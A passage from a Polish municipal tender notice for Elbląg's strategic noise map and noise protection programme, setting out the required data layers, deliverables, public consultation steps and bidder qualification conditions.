-	liczba zwrotnic na 100 m (jeśli występują),
-	rodzaj podkładów,
-	sposób mocowania szyn do podkładów (za pomocą elementów sprężystych lub na sztywno).
Dla wyodrębnionych odcinków ww. parametry muszą być stałe.
Do obliczeń akustycznych niezbędne są następujące dane dot. ruchu pojazdów:
-	klasy  rodzaje (typ pojazdów tramwajowych),
-	struktura ruchu (średnia roczna ilości pojazdów poszczególnych klas w porze dziennej, wieczorowej i nocnej),
-	liczba pojazdów hamujących dla poszczególnych klas pojazdów na wyodrębnionych odcinkach,
-	średnia prędkość pojazdów,
-	średnia prędkość pojazdów hamujących,
-	prędkość maksymalna.
Z uwagi na brak referencyjnych modeli oceny emisji hałasu tramwajowego, zarówno w kraju, jak też w modelach europejskich, dane wejściowe dotyczące komunikacji tramwajowej muszą być uzupełnione wynikami badań hałasu emitowanego przez tabor tramwajowy w warunkach rzeczywistych. Badania pomiarowe prowadzić można w oparciu o postanowienia normy PN-EN IOS 3095:2005 (U).
4) 	Warstwa z informacją o trasach komunikacji kolejowej
Odcinek linii kolejowej jest najmniejszym elementem uwzględnionym w obliczeniach akustycznych i reprezentuje on odcinek trasy lub w przypadku trasy wielotorowej, odcinek toru, dla którego muszą być znane następujące parametry:
-	położenie osi każdego istotnego toru trasy kolejowej - geometria nasypu lub wykopu,
-	rodzaj podłoża oraz sposób mocowania szyn do podłoża względnie podkładów,
-	dokładna lokalizacja współrzędnej z (wysokość) górnej powierzchni szyn,
-	nachylenie (może być odczytane automatycznie z rzeźby terenu),
-	rodzaj i stan techniczny szyn (systematycznie szlifowane, nieszlifowane),
-	sposób łączenia szyn (spawanie, skręcanie),
-	liczba połączeń na 100 m toru (jeśli występują),
-	liczba zwrotnic na 100 m (jeśli występują),
-	sposób mocowania szyn do podkładów (za pomocą elementów sprężystych lub na sztywno).
Dane powyższe są praktycznie tego samego rodzaju, jak dla linii tramwajowej.
Dla wyodrębnionych odcinków ww. parametry muszą być stałe.
Oprócz tego do obliczeń akustycznych niezbędne są następujące dane dotyczące ruchu pojazdów:
-	klasy (rodzaje) pociągów, w większości przypadków wystarczający jest podział na trzy klasy pociągów: pasażerskie pospieszne, pasażerskie regionalne,  towarowe,
-	struktura ruchu (średnia roczna ilości pojazdów poszczególnych klas w porze dziennej, wieczorowej i nocnej),
-	liczba pojazdów hamujących dla poszczególnych klas pociągów na wyodrębnionych odcinkach,
-	średnia prędkość pociągów,
-	średnia prędkość pociągów hamujących,
-	prędkość maksymalna.
Zalecana holenderska metoda oceny hałasu kolejowego RMR posiada źródłową bazę danych, zawierającą parametry emisji hałasu przez poszczególne rodzaje pociągów. 
5)	Warstwa budynków:
Podstawowymi danymi wyjściowymi są rzuty budynków, które muszą mieć postać linii zamkniętej. Do każdego rzutu budynku dołączona powinna zostać tabela atrybutów zawierająca następujące informacje:
-	ID budynku
-	adres budynku (ulica i numer domu),
-	wysokość (względna),
-	rodzaj (mieszkalny, gospodarczy zakład przemysłowy, biuro, szkoły, przedszkola, szpitale, domy opieki społecznej itd.),
-	ilość mieszkańców, uczniów, studentów, pacjentów itd.
oraz inne niezbędne dane potrzebne do  poprawnego modelowania hałasu.
6)	Warstwa zakładów przemysłowych
Do opracowania mapy hałasu przemysłowego dane wejściowe należy przygotować w zakresie określonym niżej. Przy czym należy rozróżnić tutaj dwie kategorie obiektów:
-	centra handlowe i spedycyjne, hurtownie, porty, dworce towarowe,
-	zakłady produkcyjne (przemysłowe).
W przypadku opracowywania mapy akustycznej na obszarach otaczających centra handlowe i spedycyjne, hurtownie, porty, dworce towarowe oraz zakłady przemysłowe, uaktualnić i zgromadzić należy następujące dane wejściowe:
Informacje graficzne:
-	położenie działki z zaznaczonymi granicami,
-	rzuty istniejącej zabudowy obiektu,
-	zaznaczone trasy samochodów osobowych i ciężarowych na obszarze działki,
-	zaznaczone trasy ew. kolei przemysłowych,
-	położenie parkingów dla samochodów osobowych i ciężarowych,
-	położenie miejsc przeładunku dla samochodów ciężarowych,
-	położenie miejsc przeładunku dla statków (dźwigi przeładunkowe),
-	położenie innych źródeł hałasu na obszarze przemysłowym, np. warsztaty, stacje paliwowe itd.
Dane tekstowe i numeryczne:
-	czas pracy obiektu (ew. czas pracy poszczególnych stanowisk przeładunkowych o ile czas jest różny),
-	liczba miejsc postojowych dla samochodów osobowych,
-	średnie (szacunkowe) natężenie ruchu samochodów osobowych - oddzielnie dla: pory dziennej; pory wieczornej i pory nocnej,
-	liczba miejsc postojowych dla samochodów ciężarowych, 
-	średnie (szacunkowe) natężenie ruchu samochodów ciężarowych - oddzielnie dla: pory dziennej; pory wieczorowej i pory nocnej,
-	liczba miejsc przeładunkowych dla samochodów ciężarowych,
-	średnie (szacunkowe) ilości przeładowywanych samochodów ciężarowych - oddzielnie dla: pory dziennej, pory wieczorowej, pory nocnej,
-	średnie (szacunkowe) ilości przeładowywanych wagonów kolejowych - oddzielnie dla: pory dziennej, pory wieczorowej i pory nocnej,
-	średni (szacunkowy) czas rozładunku lub załadunku 1 samochodu ciężarowego,
-	średni (szacunkowy) czas rozładunku lub załadunku 1 wagonu,
-	technika przeładunku (rodzaj i ilość dźwigów, stacjonarne rampy zewnętrzne, przeładunek z wykorzystaniem platformy samochodowej, wykorzystanie elektrycznych wózków widłowych, wykorzystanie wózków widłowych z napędem spalinowym, kontenery inne techniki przeładunkowe),
-	technika przeładunku (rodzaj i ilość dźwigów, stacjonarne rampy zewnętrzne, przeładunek z wykorzystaniem platformy samochodowej, wykorzystanie elektrycznych wózków widłowych, wykorzystanie wózków widłowych z napędem spalinowym, kontenery inne techniki przeładunkowe),
-	wysokość zabudowy ew. wysokość urządzeń przeładunkowych.
Poza danymi graficznymi niezbędne są kopie opracowań dotyczących emisji hałasu do środowiska (np. opracowanych w ramach pozwoleń zintegrowanych) względnie protokołów pomiarowych hałasu emitowanego przez zakład do środowiska oraz dodatkowo, informacje dotyczące ruchu i miejsc postojowych środków transportu osobowego i towarowego.
Należy znać charakterystyki (rodzaj) źródła hałasu, położenie i czas emisji hałasu do środowiska (albo czas pracy urządzeń emitujących hałas na zewnątrz do środowiska). Zaleca się dokonanie analizy materiałów przygotowywanych do różnego rodzaju pozwoleń i decyzji (np. o dopuszczalnym poziomie hałasu) lub materiałów o charakterze OOŚ. 
Dla hałasu generowanego przez uciążliwą działalność gospodarczą tj. instalacje do przetwarzania odpadów (składy złomu), składy przeładunkowe węgla, itp. należy utworzyć oddzielną warstwę tematyczną przy warstwie zakładów przemysłowych).
7)	Warstwa parkingów:
Musi  powstać w formie graficznej i tabelarycznej z opisem cech parkingów większych niż 50 miejsc postojowych dla samochodów osobowych lub więcej niż 20 miejsc postojowych w przypadku parkingów dla samochodów ciężarowych i zawierać w szczególności:
	rodzaj parkingu, 
	ilość miejsc parkingowych, 
	miejsca parkingowe dla samochodów osobowych,
	miejsca parkingowe dla samochodów ciężarowych,
	rodzaj nawierzchni parkingu,
	średnią  ilość zmian przypadającą na jedno miejsce postojowe (rozumianą jako wjazd i wyjazd na miejsce parkowania)  dla pory dziennej, wieczorowej i nocnej,
oraz inne dane akustyczne i nieakustyczne niezbędne do poprawnego modelowania hałasu.
8)	Warstwa obszarów leśnych i parkowych:
Musi powstać na podstawie informacji przekazanych przez Zamawiającego (ortofotomapa) oraz innych niezbędnych danych zebranych przez Wykonawcę potrzebnych do poprawnego modelowania hałasu. 
Warstwa musi zawierać:
-	położenie terenów zielonych,
-	rodzaj terenu zielonego (las, park, skwer),
-	średnia wysokość względna zadrzewienia.
9)	Warstwa użytkowania terenu:
Warstwę użytkowania terenu (mapę wrażliwości terenu na hałas) należy sporządzić w odniesieniu do miejscowych planów zagospodarowania przestrzennego lub, w przypadku ich braku, do innych dokumentów planistycznych, w tym do opracowań ekofizjograficznych, studiów zagospodarowania przestrzennego oraz będących w realizacji planów zagospodarowania przestrzennego. Jeżeli kwalifikowany teren może być zaliczony do kilku rodzajów terenów chronionych akustycznie, zalicza się go do terenu o przeważającej funkcji.
10)	Warstwa szorstkości terenu:
Graficzne przedstawienie lokalizacji terenu wraz z rodzajem gruntu z podziałem na tereny utwardzone i nieutwardzone.
5.5.	Wykonawca zobowiązany będzie do informowania Zamawiającego o postępach w realizacji przedmiotu zamówienia na każdym etapie realizacji i udzielania wszelkich informacji i udostępniania wyników prac w trakcie realizacji przedstawicielowi Zamawiającego.
5.6.	Przekazanie Zamawiającemu przedmiotu zamówienia dot. MAPY:
1)	Wykonawca przekaże Zamawiającemu (w siedzibie Zamawiającego) działający system, zainstalowany na wskazanym przez Zamawiającego serwerze wraz z dokumentacją obsługi systemu, wyczerpującą instrukcją eksploatacji i aktualizacji mapy, wydruki kontrolne zawierające etapy wykonywanych prac, dokumentację końcową zawierającą zestaw wydruków odzwierciedlających część opisową i graficzną MAPY.
2)	W ramach przedmiotu zamówienia Wykonawca zobowiązuje się dostarczyć i przekazać  Zamawiającemu zebrane, zweryfikowane  i zaktualizowane dane oraz wykonane pomiary akustyczne i nieakustyczne niezbędne do wykonania MAPY, stanowiące przedmiot zamówienia w formacie umożliwiającym otwarcie edycję i zapisywanie  plików w oprogramowaniu, którym dysponuje Zamawiający tj.  CadnaA 32bit, wersja 4.2. firmy DataKustik GmbH.
3)	Wykonawca w ramach przedmiotu zamówienia zapewni przeszkolenie 3 osób, w tym jednego administratora systemu, w siedzibie Zamawiającego w zakresie użytkowania przedmiotu zamówienia (minimum 3 dni szkolenia). Szkolenie musi odbywać się w godzinach pracy Urzędu i trwać 3 dni robocze po 8 godzin.
4)	Wykonawca zobowiąże się do udzielania bezpłatnej pomocy, konsultacji i dodatkowych informacji w razie zaistnienia potrzeby, drogą telefoniczną oraz za pośrednictwem poczty elektronicznej przez okres 60 miesięcy od daty odbioru końcowego przedmiotu zamówienia.
5)	W ramach przedmiotu zamówienia Wykonawca wykona:
a)	konfigurację wykonanych warstw tematycznych na serwerze Urzędu Miasta Elbląg oraz na sprzęcie komputerowym zainstalowanym w siedzibie i na stanowisku wskazanym przez Zamawiającego umożliwiającą wizualizację tych warstw,
b)	informację internetową umieszczoną na portalu Urzędu Miejskiego w Elblągu umożliwiającą prezentację MAPY jako informacji dla społeczeństwa.
6)	Wykonawca przekaże Zamawiającemu dokumentację zawierającą:
a)	opis struktury zbiorów i baz danych zgodnie z wymaganiami Ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. z 2016 poz. 922),
b)	opis instalacji i reinstalacji w przypadku konieczności przeniesienia systemu na inny serwer,
c)	instrukcję użytkownika systemu i administratora.
7)	Wszelkie dane wejściowe wg stanu na dzień 31.12.2016 r. i wynikowe, jak również wyliczone z oprogramowania komputerowego Wykonawca przekaże w postaci operatu technicznego.
8)	Wykonawca przekaże Zamawiającemu wykonany przedmiot zamówienia stanowiący przedmiot umowy w formie pisemnej  opracowanie w formie raportu (zapis na płytach CD/DVD  5 egz.), materiały tekstowe przekazane zostaną w formacie MS Word, materiały graficzne przekazane zostaną w formacie wcześniej uzgodnionym z Zamawiającym.
9)	Wykonawca zobowiązany będzie do przeprowadzenia prezentacji przedmiotu zamówienia w terminie uzgodnionym z Zamawiającym w siedzibie Zamawiającego. 
6.	Wykonanie  PROGRAMU: 
6.1.	Projekt PROGRAMU powinien powstać przy następujących założeniach:
1)	MAPA jest podstawą do wykonania PROGRAMU,
2)	Zamawiający udostępni Wykonawcy na potrzeby aktualizacji PROGRAMU następujące materiały:
-	PROGRAM przyjęty Uchwałą nr 625/2013 pełniącego funkcje organów Miasta Elbląg działającego za Radę Miejską z dnia 18.06.2013 r. w formacie plików .pdf,
-	Raporty z realizacji postanowień ww. PROGRAMU w formacie pliku .pdf, będące w posiadaniu Zamawiającego.
3)	Wykonawca odpowiada za nieprzekazywanie udostępnionych przez Zamawiającego materiałów na zewnątrz.
4)	Wykonawca przeanalizuje stan realizacji zapisów PROGRAMU, przyjętego uchwałą pełniącego funkcję organów Miasta Elbląg działającego za Radę Miejską z dnia 18.06.2013 r.
5)	W przypadku niedostatecznej ilości danych wejściowych, Wykonawca zobowiązuje się do pozyskania brakujących materiałów we własnym zakresie i na własny koszt.
6)	Do opracowania PROGRAMU niezbędne będzie przeprowadzenie niżej wymienionych analiz wszystkich zidentyfikowanych na mapie akustycznej obszarów zagrożonych hałasem ze wszystkich źródeł hałasu:
a)	analizy  akustycznej  wykonawca dokona oceny powstającej emisji i imisji hałasu w związku z eksploatacją instalacji, zakładów, urządzeń, dróg, linii kolejowych, linii tramwajowych, które były przedmiotem mapowania akustycznego Miasta Elbląg. W tym celu wykonawca przeprowadzi analizę strategicznej mapy hałasu m. Elbląg w szczególności imisyjnych  map  hałasu dla wskaźników LDWN i LN , map przekroczeń poziomów dopuszczalnych oraz mapy wrażliwości hałasowej obszarów w celu wyznaczenia terenów do podjęcia działań naprawczych. W ramach PROGRAMU Wykonawca wyznaczy i zaproponuje również tzw. obszary ciche na terenie miasta Elbląg zgodnie z definicją  podaną  w art. 3 pkt  10a ustawy Prawo ochrony środowiska oraz przedstawi warunki, jakie należy spełnić, aby klimat akustyczny na wyznaczonych obszarach cichych  nie uległ pogorszeniu;
b)	 analizy  wskaźnika M  wykonawca opracuje podstawową metodykę klasyfikacji obszarów zagrożonych hałasem oraz ustali priorytety działań w oparciu o wskaźnik M (wskaźnik uwzględniający wielkość przekroczenia dopuszczalnego poziomu hałasu i liczbę mieszkańców na danym terenie), określony przez Ministra Środowiska w Rozporządzeniu z dnia 14.10.2002 r. w sprawie szczegółowych wymagań, jakim powinien odpowiadać program ochrony środowiska przed hałasem;
c)	analizy  prawnej - w ramach analizy prawnej Wykonawca wskaże uwarunkowania prawne związane z ochroną przed hałasem oraz wynikające z nich procedury, w kontekście odpowiedzialności i kompetencji. Wykonawca dokona analizy wszystkich przygotowywanych i istniejących w mieście Elbląg koncepcji, strategii, planów i studiów, o których mowa w art. 71 ustawy Prawo ochrony środowiska, mających wpływ na kształtowanie klimatu akustycznego w m. Elbląg;
d)	analizy ekonomicznej  dla poszczególnych rozwiązań akustycznych należy przeprowadzić analizę kosztów realizacji poszczególnych zadań i zastosowanych środków ograniczających rozprzestrzenianie się hałasu. Wykonawca określi wielkość środków potrzebnych na realizację proponowanych działań, uwzględniając warianty wynikające z Wieloletniej Prognozy Finansowej Gminy Miasto Elbląg na lata 2016  2029, jak również określi zależność efektów ochrony przed hałasem od poniesionych nakładów finansowych.
7)	Dla wszystkich obszarów zagrożonych hałasem, dla których zaproponowane zostaną środki ochrony przed hałasem, zaprezentowane zostaną wyniki obliczeń symulacyjnych pokazujące skuteczność proponowanych rozwiązań technicznych wzgl. organizacyjnych.
8)	Poszczególne działania naprawcze mogą zostać pogrupowane w terminy realizacji (krótko, średnio i długo okresowe), biorąc pod uwagę minimalne dostępne środki finansowe przeznaczone na ich realizację.
9)	Wykonawca przy tworzeniu harmonogramu działań wykorzysta istniejące plany i programy inwestycyjne oraz dochody i wydatki określone w Wieloletniej Prognozie Finansowej Gminy Miasto Elbląg na lata 2016  2029.
10)	W harmonogramie realizacji PROGRAMU Wykonawca ściśle określi zarządców źródeł hałasu, jak również sprecyzuje finansowanie działań naprawczych przez tych zarządców.
11)	Uzasadnienie PROGRAMU musi zawierać informacje dotyczącą terenów nie objętych PROGRAMEM z podaniem przyczyny nie uwzględnienia ich w PROGRAMIE.
12)	Poszczególne obszary objęte PROGRAMEM muszą zostać scharakteryzowane osobno z podaniem tendencji rozwoju wynikające z dokumentów planistycznych zarządców źródeł hałasu.
13)	Źródła finansowania muszą być wyszczególnione przy każdym zadaniu i uzgodnione z zarządcami źródeł hałasu.
14)	Należy wskazać przy każdym opisanym zadaniu jednostkę odpowiedzialną za jej realizację, sposób monitorowania oraz formę przekazywania informacji o realizacji zadania do Prezydenta Miasta. 
15)	Należy wskazać podmioty korzystające ze środowiska i ich obowiązki związane z realizacją PROGRAMU, w tym w szczególności zarządców dróg, linii kolejowych, linii tramwajowych oraz podmioty prowadzące działalność gospodarczą mające wpływ na klimat akustyczny Miasta Elbląg.
16)	Przy wskazaniu jednostek odpowiedzialnych za wykonanie działań naprawczych oraz kosztu ich realizacji Wykonawca skonsultuje te zapisy z jednostkami wskazanymi w PROGRAMIE do realizacji działań naprawczych. 
17)	Wykonawca opracuje streszczenie PROGRAMU, sporządzone w języku niespecjalistycznym, zawierające omówienie wszystkich ważnych aspektów działań przewidzianych w programie w formie prezentacji graficznych i zestawień tabelarycznych (zgodnie z art. 119 ust. 4a ustawy Prawo ochrony środowiska).
6.2.	Przeprowadzenie KONSULTACJI:
1)	Wykonawca  zapewni udział społeczeństwa w procesie realizacji przedmiotu zamówienia zgodnie z art. 119 ust. 2a ustawy Prawo ochrony środowiska  z dnia 27 kwietnia 2001 r. (t.j. Dz. U. z 2016 poz. 672 z późn. zm.), a także zgodnie z art. 39 i 40  ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa  w ochronie środowiska oraz o ocenach oddziaływania na środowisko (t.j. Dz. U. z 2016 poz. 353 z poźn. zm.), w następujący sposób:
a)	Wykonawca zamieści ogłoszenia o przystąpieniu do sporządzania projektu PROGRAMU na stronach internetowych Zamawiającego oraz w lokalnej prasie, 
b)	Wykonawca przygotuje materiał podlegający KONSULTACJOM w postaci:
	oprawionego wydruku (każdy dokument w 5 egz.)
	wersji elektronicznej w formacie pliku PDF zapisanego na nośniku cyfrowym  (10 szt. nośnika elektronicznego)
	Wykonawca przeprowadzi KONSULTACJE projektu PROGRAMU.  W czasie trwania KONSULTACJI społeczeństwo będzie miało możliwość przekazywania wniosków, stanowisk, opinii. 
c)	Zamawiający będzie systematycznie przekazywał Wykonawcy zgłaszane przez społeczeństwo uwagi, nie później niż w ciągu 3 dni roboczych od daty ich wpłynięcia do siedziby Zamawiającego.
d)	Wykonawca opracuje projekt PROGRAMU uwzględniającego KONSULTACJE.
e)	Wykonawca wykona RAPORT z KONSULTACJI, który zawierał będzie:
	opis przeprowadzonej akcji informacyjnej,
	przebieg KONSULTACJI,
	zebrane w KONSULTACJACH uwagi i wnioski wraz z podaniem odniesienia do tekstu PROGRAMU, w przypadku wniosków przyjętych,
	 uzasadnienia dot. nieprzyjęcia uwag i wniosków, w przypadku wniosków odrzuconych, który dołączy do projektu PROGRAMU.
2)	Koszty związane z KONSULTACJAMI pokrywa Wykonawca.
6.3.	Uchwalenie PROGRAMU:
a)	przedstawienie i przekazanie Zamawiającemu projektu PROGRAMU w postaci wydruku (5 egz.) oraz w wersji cyfrowej w formacie pdf oraz doc (umożliwiającym edycję treści) na nośniku DVD (5 szt.) wraz z prezentacją wykonaną w programie PowerPoint  w postaci wydruku (5 egz.) oraz w wersji cyfrowej w formacie pdf  oraz PPT na nośniku DVD (5 szt.),
b)	prezentacja projektu PROGRAMU w Urzędzie Miejskim w Elblągu (narady, komisje Rady Miejskiej)  w terminie/terminach wskazanych przez Zamawiającego, udzielanie wyjaśnień.
c) dokonanie ewentualnych zmian w opracowaniu wynikających z przyjętych uwag zgłoszonych na etapie prezentacji przedmiotu umowy.
d)	udział w posiedzeniach komisji Rady Miejskiej oraz w sesji Rady Miejskiej, w której porządku obrad zostanie umieszczona sprawa uchwalenia PROGRAMU i udzielanie w trakcie posiedzeń wyjaśnień i informacji dotyczących PROGRAMU.
e)	przygotowanie PROGRAMU z uwzględnieniem zmian wprowadzonych przez radnych.
f)	umieszczenie uchwalonego PROGRAMU w portalu MAPY zintegrowanym z Elbląskim Systemem Informacji Przestrzennej-w terminie do dnia 28 czerwca 2018 r. 
7.	Wykonanie SPRAWOZDAŃ:
Wykonawca na wniosek Zamawiającego przez okres 5 lat od daty odbioru Etapu I będzie opracowywać SPRAWOZDANIA zgodnie z art. 10 ust. 2 dyrektywy 2002/49/WE Parlamentu Europejskiego i Rady z dnia 25 czerwca 2002 r. odnoszącej się do oceny i zarządzania  poziomem hałasu w środowisku.
Wykonawca na wniosek Zamawiającego przez okres 5 lat od daty odbioru Etapu II do czasu wymaganej ustawą Prawo ochrony środowiska aktualizacji PROGRAMU będzie opracowywać SPRAWOZDANIA, o ile będą wymagane.
8.	Zamawiający wymaga, aby wszystkie pomiary dotyczące przedmiotu zamówienia były wykonywane przez akredytowane laboratorium w rozumieniu ustawy z dnia 30 sierpnia 2002 r. o systemie oceny zgodności (t.j. Dz. U. z 2016 r. poz. 655 z późn. zm.), zapewniające wykonanie pomiarów hałasu, w środowisku w zakresie następujących źródeł hałasu: hałasu pochodzącego od dróg, linii kolejowych, linii tramwajowych, zakładów przemysłowych, zgodnie z art. 147a ust. 1 ustawy z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (t.j. Dz. u . z 2016 r. poz. 672 z późn. zm).
9.	Zamawiający wymaga, aby na poszczególne etapy zamówienia Wykonawca udzielił gwarancji jakości na okres 60 miesięcy.
10. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy. Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia na usługi.
11.	Zamawiający żąda wskazania przez Wykonawcę części zamówienia, której wykonanie zamierza powierzyć podwykonawcy, i podania przez Wykonawcę firm podwykonawców.
12.	Zamawiający żąda, aby przed przystąpieniem do wykonania zamówienia Wykonawca, o ile są już znane, podał nazwy albo imiona i nazwiska oraz dane kontaktowe podwykonawców i osób do kontaktu z nimi, zaangażowanych w  usługi. Wykonawca zobowiązany będzie zawiadamiać Zamawiającego o wszelkich zmianach danych, o których mowa w zdaniu pierwszym, w trakcie realizacji zamówienia, a także przekazywać informacje na temat nowych podwykonawców, którym w późniejszym okresie zamierza powierzyć realizację usług.
13.	Zamawiający informuje, że jeżeli powierzenie wykonania części zamówienia na usługi podwykonawcy nastąpi w trakcie jego realizacji, wykonawca na żądanie Zamawiającego przedstawi oświadczenie, o którym mowa w art. 25a ust. 1 ustawy Prawo zamówień publicznych, lub oświadczenia lub dokumenty potwierdzające brak podstaw wykluczenia wobec tego podwykonawcy.
Jeżeli Zamawiający stwierdzi, że wobec danego podwykonawcy zachodzą podstawy wykluczenia, wykonawca obowiązany będzie zastąpić tego podwykonawcę lub zrezygnować z powierzenia wykonania części zamówienia podwykonawcy.
Zamawiający informuje, że powyższe zasady nie będą miały zastosowania wobec dalszych podwykonawców.
<br /><br /><b>II.5) Główny kod CPV: </b>90742200-2<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 29/06/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie określa przedmiotowego warunku udziału.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie określa przedmiotowego warunku udziału.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Warunkiem udziału w postępowaniu jest:
1)	wykonanie w sposób należyty w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: 
a)	co najmniej dwóch map akustycznych miast o ilości mieszkańców co najmniej 100 tys. oraz co najmniej dwóch programów ochrony środowiska przed hałasem o ilości mieszkańców co najmniej 100 tys., wykonanych zgodnie z wymaganiami ustawy Prawo ochrony środowiska z uwzględnieniem następujących źródeł hałasu: drogowego, kolejowego, przemysłowego.

Przy ocenie spełniania tego warunku udziału przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) Zamawiający wymaga, aby usługi potwierdzające spełnienie przedmiotowego warunku, tj.:
-	co najmniej dwie mapy akustyczne zostały wykonane przez jednego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, 
-	co najmniej dwa programy ochrony środowiska przed hałasem zostały wykonane przez jednego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia,
b)	co najmniej jednego portalu trójwymiarowego mapy akustycznej dla miasta o ilości mieszkańców co najmniej 100 tys., udostępnionej w internecie.
c)	co najmniej jednego sprawozdania do Komisji Europejskiej zgodnie z art. 10 ust. 2 Dyrektywy 2002/49/WE Parlamentu Europejskiego i Rady z dnia 25 czerwca 2002 r. odnoszącej się do oceny i zarządzania poziomem hałasu w środowisku;

2)	dysponowanie oprogramowaniem do obliczeń i modelowania hałasu środowiskowego, które realizuje metody obliczeniowe hałasu zalecane Dyrektywą 2002/49/WE, na które posiadają ważną licencję,

3)	dysponowanie zespołem osób, w składzie których będzie co najmniej:
a)	jedna osoba posiadająca wykształcenie wyższe w zakresie akustyki oraz doświadczenie w realizacji co najmniej dwóch map akustycznych w miastach o liczbie mieszkańców co najmniej 100 tysięcy;
b)	jedna osoba posiadająca wykształcenie wyższe informatyczne i doświadczenie w tworzeniu i wdrożeniu jednego portalu trójwymiarowego mapy akustycznej;
c)	jedna osoba posiadająca uprawnienia zawodowe w dziedzinie geodezji i kartografii (o których mowa w art. 43 ustawy Prawo geodezyjne i kartograficzne) w zakresie geodezyjnych pomiarów sytuacyjno-wysokościowych realizacyjnych i inwentaryzacyjnych oraz w zakresie redakcji map i w zakresie fotogrametrii i teledetekcji;
d)	jedna osoba posiadająca wykształcenie wyższe w zakresie ochrony środowiska i doświadczenie w tworzeniu co najmniej jednego programu ochrony środowiska przed hałasem;
e)	jedna osoba posiadająca minimum 3 lata doświadczenia w pomiarach hałasu środowiskowego.
Zamawiający nie dopuszcza łączenia więcej niż jednej funkcji, o których mowa powyżej w lit. a), b), c), d) i e), przez jedną osobę.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1)	zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
Uwaga:
a)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia,
b)	w przypadku wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy Prawo zamówień publicznych, przedmiotowy dokument należy złożyć także w odniesieniu do tych podmiotów, 
